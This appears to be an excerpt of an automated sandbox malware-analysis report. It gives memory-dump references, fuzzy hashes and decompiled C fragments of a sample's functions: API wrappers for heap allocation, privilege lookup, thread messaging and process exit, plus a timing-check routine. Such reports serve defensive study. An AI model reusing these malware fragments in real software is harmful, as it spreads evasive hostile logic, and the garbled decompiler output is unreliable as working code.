Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction ID: 98b7ab4c3374ce945d87304c272764997da5ea40185bb6170513ade09291bf69
Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A

Uniqueness

Uniqueness Score: -1.00%

Function 009AFB68, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFB73

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446

Uniqueness

Uniqueness Score: -1.00%

Function 009AFC90, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFC9B

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546

Uniqueness

Uniqueness Score: -1.00%

Function 009AFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFC6B

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A

Uniqueness

Uniqueness Score: -1.00%

Function 009AFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFD9A

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686

Uniqueness

Uniqueness Score: -1.00%

Function 009AFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFDCB

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486

Uniqueness

Uniqueness Score: -1.00%

Function 009AFEA0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFEAB

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction ID: c5322eb374cbfb3adeb08d178b54e1ae74a7d58a0408861c097d1ba4bd942992
Opcode Fuzzy Hash: 6032af2d0d5c3e144073b0b78b369b1f4db831bf511812c370cfa36f16aa84fd
Instruction Fuzzy Hash: 0DB01272200640C7F31A9714D906F4B7210FB80F00F00893AA007C19A1DB389A2CD556

Uniqueness

Uniqueness Score: -1.00%

Function 009AFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFEDB

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A

Uniqueness

Uniqueness Score: -1.00%

Function 009AFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 009AFFBF

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A

Uniqueness

Uniqueness Score: -1.00%

Function 004088E0, Relevance: .1, Instructions: 92
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E004088E0(intOrPtr* _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t39;
				void* _t50;
				intOrPtr* _t52;
				void* _t53;
				void* _t54;
				void* _t55;
				void* _t56;

				_t52 = _a4;
				_t39 = 0; // executed
				_t24 = E00406E30(_t52,  &_v24); // executed
				_t54 = _t53 + 8;
				if(_t24 != 0) {
					E00407040( &_v24,  &_v840);
					_t55 = _t54 + 8;
					do {
						E0041A110( &_v284, 0x104);
						E0041A780( &_v284,  &_v804);
						_t56 = _t55 + 0x10;
						_t50 = 0x4f;
						while(1) {
							_push( &_v284);
							_push(E00413DA0(_t52, _t50));
							_t31 = E00413E00();
							_t56 = _t56 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t50 = _t50 + 1;
							if(_t50 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t52 + 0x14; // 0xffffe1a5
						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407070( &_v24,  &_v840);
						_t55 = _t56 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t34 = E004070F0(_t52,  &_v24); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						asm("rdtsc");
						_v8 = _t34 - 0 + _t34;
						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
					_t20 = _t52 + 0x31; // 0x5608758b
					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}

0x004088eb
0x004088f3
0x004088f5
0x004088fa
0x004088ff
0x00408912
0x00408917
0x00408920
0x0040892c
0x0040893f
0x00408944
0x00408947
0x00408950
0x00408956
0x00408961
0x00408962
0x00408967
0x0040896c
0x00000000
0x00000000
0x0040896e
0x00408972
0x00000000
0x00000000
0x00408974
0x00000000
0x00408972
0x00408976
0x00408979
0x0040897f
0x00408981
0x0040898c
0x00408991
0x00408994
0x004089a1
0x004089ac
0x004089ae
0x004089b4
0x004089b8
0x004089bb
0x004089bb
0x004089c2
0x004089c5
0x004089ca
0x004089d7
0x00408906
0x00408906
0x00408906

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36f28137c473b1d7800f4614c9ffc2b53779ab02a0ac0278687683c51d908026
Instruction ID: b342730474dcc0ac064d0d011e1d56cf5cdba0abec35914909fd77f498fa833d
Opcode Fuzzy Hash: 36f28137c473b1d7800f4614c9ffc2b53779ab02a0ac0278687683c51d908026
Instruction Fuzzy Hash: 7B21F8B2D4420957CB15E6649E42AFF73AC9B50308F04057FE989A2181F639AB498BA7

Uniqueness

Uniqueness Score: -1.00%

Function 004188C0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004188C0(intOrPtr _a4, char _a8, long _a12, long _a16) {
				void* _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
				_t6 =  &_a8; // 0x413546
				_t10 = RtlAllocateHeap( *_t6, _a12, _a16); // executed
				return _t10;
			}

0x004188d7
0x004188e2
0x004188ed
0x004188f1

APIs

RtlAllocateHeap.NTDLL(F5A,?,00413CBF,00413CBF,?,00413546,?,?,?,?,?,00000000,00408B23,?), ref: 004188ED

Strings

F5A, xrefs: 004188E2, 004188EC

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap
String ID: F5A
API String ID: 1279760036-683449296
Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction ID: c53d960059fd60d51188ffd50ae561d8054dda033e2458622c390dbd27fda9b7
Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
Instruction Fuzzy Hash: 61E012B1200208ABDB14EF99CC85EA777ACAF88654F118559FE085B242C630F914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00407290, Relevance: 1.6, APIs: 1, Instructions: 55
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00407290(void* __eflags, intOrPtr _a4, long _a8) {
				char _v67;
				char _v68;
				void* _t12;
				intOrPtr* _t13;
				int _t14;
				long _t21;
				intOrPtr* _t25;
				void* _t26;
				void* _t30;

				_t30 = __eflags;
				_v68 = 0;
				E0041A160( &_v67, 0, 0x3f);
				E0041AD40( &_v68, 3);
				_t12 = E00409B50(_t30, _a4 + 0x1c,  &_v68); // executed
				_t13 = E00413E60(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
				_t25 = _t13;
				if(_t25 != 0) {
					_t21 = _a8;
					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
					_t32 = _t14;
					if(_t14 == 0) {
						_t14 =  *_t25(_t21, 0x8003, _t26 + (E004092B0(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
					}
					return _t14;
				}
				return _t13;
			}

0x00407290
0x0040729f
0x004072a3
0x004072ae
0x004072be
0x004072ce
0x004072d3
0x004072da
0x004072dd
0x004072ea
0x004072ec
0x004072ee
0x0040730b
0x0040730b
0x00000000
0x0040730d
0x00407312

APIs

PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072EA

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: MessagePostThread
String ID:
API String ID: 1836367815-0
Opcode ID: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
Instruction ID: 4250000cacc114d134f5be589493d0900fd96f71ac8f672bcf1e10d74895a7a9
Opcode Fuzzy Hash: 103af01fa6ced0b1bf26eae8f883133b32587eddec92ce106ebb367855adc8e1
Instruction Fuzzy Hash: F6018431A8022876E721A6959C03FFF776C5B00B55F04415AFF04BA1C2E6E8790586FA

Uniqueness

Uniqueness Score: -1.00%

Function 00418900, Relevance: 1.5, APIs: 1, Instructions: 24
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418900(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;
				void* _t15;

				_t3 = _a4 + 0xc74; // 0xc74
				E004191F0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}

0x0041890f
0x00418917
0x0041892d
0x00418931

APIs

RtlFreeHeap.NTDLL(00000060,00408B23,?,?,00408B23,00000060,00000000,00000000,?,?,00408B23,?,00000000), ref: 0041892D

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction ID: 5f54135a6d5665afae9514b011c4f342711cdf5a633985feeb8d835705c457f1
Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
Instruction Fuzzy Hash: 98E012B1200208ABDB18EF99CC89EA777ACAF88750F018559FE085B242C630E914CAB0

Uniqueness

Uniqueness Score: -1.00%

Function 00418A60, Relevance: 1.5, APIs: 1, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418A60(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;
				void* _t15;

				E004191F0(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}

0x00418a7a
0x00418a90
0x00418a94

APIs

LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFD2,0040CFD2,00000041,00000000,?,00408B95), ref: 00418A90

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: LookupPrivilegeValue
String ID:
API String ID: 3899507212-0
Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction ID: b5f2a6165515d53f35f5e56a9475d77ccb8deec25097a7d382054e427d326996
Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
Instruction Fuzzy Hash: 93E01AB12002086BDB10DF49CC85EE737ADAF88650F018155FE0857242C934E8548BF5

Uniqueness

Uniqueness Score: -1.00%

Function 00418932, Relevance: 1.5, APIs: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00418932(int _a4) {
				intOrPtr _v0;
				long long* _t14;
				void* _t16;
				long long _t24;

				 *_t14 = _t24;
				asm("cmc");
				asm("sahf");
				asm("daa");
				_push(0x55);
				_t9 = _v0;
				E004191F0(_t16, _v0, _v0 + 0xc7c,  *((intOrPtr*)(_t9 + 0xa14)), 0, 0x36);
				ExitProcess(_a4);
			}

0x0041893a
0x0041893c
0x0041893d
0x0041893e
0x0041893f
0x00418943
0x0041895a
0x00418968

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 8cf43e61307af417c9344402cae0d2bcedb180281e570f97fe2610ac907d0b95
Instruction ID: e5ae0cf198d8dd56eb6a6439ceabb1683ab8dddb5c4af23388d1874227d5f423
Opcode Fuzzy Hash: 8cf43e61307af417c9344402cae0d2bcedb180281e570f97fe2610ac907d0b95
Instruction Fuzzy Hash: BCE04F31600704BBD721DF59CC9AFA33BA8AF44750F518499BA595F281CA31AA05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 00418940, Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418940(intOrPtr _a4, int _a8) {
				void* _t10;

				_t5 = _a4;
				E004191F0(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
				ExitProcess(_a8);
			}

0x00418943
0x0041895a
0x00418968

APIs

ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418968

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction ID: 1333b191b135ec901ac61a9cb59cf638980f097d56b5f16c626c7f81ecdb5f9b
Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
Instruction Fuzzy Hash: 52D012716002187BD620DF99CC85FD7779CDF48750F018065BA1C5B242C531BA00C6E1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 009C26F8, Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction ID: 20c361e048fd47ee2666f81de9c99e82315c2afe0a218ebd378aa5cf3406533a
Opcode Fuzzy Hash: befe73b4781d6967e22b7a2d8b560eb031a7a61a4f73831a88057bacb28cb109
Instruction Fuzzy Hash: 8FF0AF21B24159ABDB48EB189991F6A3399EB94300F54C43DE949CB251D625AD408692

Uniqueness

Uniqueness Score: -1.00%

Function 00406AB8, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e57f0e330a17ff757928ca178325f81b9e3bb127ad633aa1cda2ee8fcbac6f31
Instruction ID: f47fa636fac0e8fa193b29463958b6cb9240df98aff8508e5d6aafe9be4200ba
Opcode Fuzzy Hash: e57f0e330a17ff757928ca178325f81b9e3bb127ad633aa1cda2ee8fcbac6f31
Instruction Fuzzy Hash: 9CC08013F494518FD3211C1CF4903F0E7A4D773120D182683D80563201C047D958C6C5

Uniqueness

Uniqueness Score: -1.00%

Function 00415854, Relevance: .0, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E00415854(void* __eax) {
				void* _t5;

				L0:
				while(1) {
					L0:
					asm("clc");
					asm("sti");
					asm("invalid");
					_t5 = _t5 + 1;
					asm("clc");
					if (_t5 <= 0) goto L1;
				}
				asm("invalid");
				return __eax;
			}

0x00415854
0x00415854
0x00415854
0x00415854
0x0041584d
0x0041584f
0x00415851
0x00415852
0x00415853
0x00415853
0x00415855
0x0041585f

Memory Dump Source

Source File: 00000006.00000002.461733467.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3b5045d760d270c3b3adf086a133d6440a2911fa2d6ffef0919561ace2a059b
Instruction ID: 6a5fa9ae7bfee0675d57652029b92bd950d7cc27a970e1f1e0223b4243243c4e
Opcode Fuzzy Hash: f3b5045d760d270c3b3adf086a133d6440a2911fa2d6ffef0919561ace2a059b
Instruction Fuzzy Hash: D7A0013BE490A4899A249D99B8801B4E374E5A717AA25376BDA8CB34004612E55586AC

Uniqueness

Uniqueness Score: -1.00%

Function 009B10D0, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction ID: b97e0867cf63cce6a7bd091cca7d2f61d4937398616a74d9d7050cc2a0bd1794
Opcode Fuzzy Hash: ac83c10758ebe8d5f76978585b10c9c6dce2ba331d146511a487ba092cee0476
Instruction Fuzzy Hash: E8B01272180540CBE3199718E906F5FB710FB90F00F00C93EA00781C50DA389D3CD446

Uniqueness

Uniqueness Score: -1.00%

Function 009B0060, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.461991683.00000000009A0000.00000040.00000001.sdmp, Offset: 00990000, based on PE: true

Associated: 00000006.00000002.461984936.0000000000990000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462087842.0000000000A80000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462095379.0000000000A90000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462102292.0000000000A94000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462107783.0000000000A97000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462113083.0000000000AA0000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.462150251.0000000000B00000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction ID: 5a023e870da9c1ddb48dfa425d4b1b106951aaa9a6b60f468992a3f00291b547
Opcode Fuzzy Hash: 4c5d85a427470f550e29695eb19de3105b1c03314207db60bf040a26eb212f22
Instruction Fuzzy Hash: 5CB012B2100580C7E30D9714DD06B4B7210FB80F00F00893AA10B81861DB7C9A2CD45E

Uniqueness

Uniqueness Score: -1.00%

Function 009B01D4, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

